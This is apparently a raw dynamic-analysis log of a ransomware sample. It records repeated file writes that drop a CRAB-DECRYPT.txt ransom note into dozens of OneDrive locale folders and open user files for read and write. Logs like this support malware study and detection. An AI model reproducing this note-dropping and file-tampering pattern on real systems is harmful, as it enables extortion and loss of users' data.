Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\id\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ig-ng\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\imageformats\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\images\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\is\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\it\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ja\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ka\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\kk\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\km-kh\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\kn\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ko\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\kok\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ku-arab\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ky\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\lb-lu\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\lt\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\lv\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\mi-nz\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\mk\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ml-in\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\mn\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\mr\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ms\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\mt-mt\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\nb-no\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ne-np\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\nl\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\nn-no\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\nso-za\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\or-in\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\pa\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\pa-arab\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\pl\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\platforms\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\prs-af\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\pt-br\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\pt-pt\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\qml\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\qml\QtQuick\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\qml\QtQuick.2\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\qut-latn\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\quz-pe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ro\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ro\FileSync.LocalizedResources.dll.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ru\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ru\FileSync.LocalizedResources.dll.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\rw\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\rw\FileSync.LocalizedResources.dll.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\SaveApplicationEventLogs.wsf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ScreenshotOptIn.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\sd-arab\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\si-lk\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\sk\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\sk\FileSync.LocalizedResources.dll.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\sl\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\sl\FileSync.LocalizedResources.dll.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\sq\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\sq\FileSync.LocalizedResources.dll.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\sr-cyrl-ba\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\sr-cyrl-rs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\sr-latn-rs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\sv\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\sw\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ta\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\te\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\tg-cyrl\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\th\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ti\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\tk-tm\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\tn-za\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\tr\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\tt\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ug-arab\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\uk\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ur\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\uz-latn-uz\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\vi\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\wo\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\xh-za\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\yo-ng\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\zh-cn\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\zh-tw\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\zu-za\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\logs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\logs\Common\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\logs\Personal\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
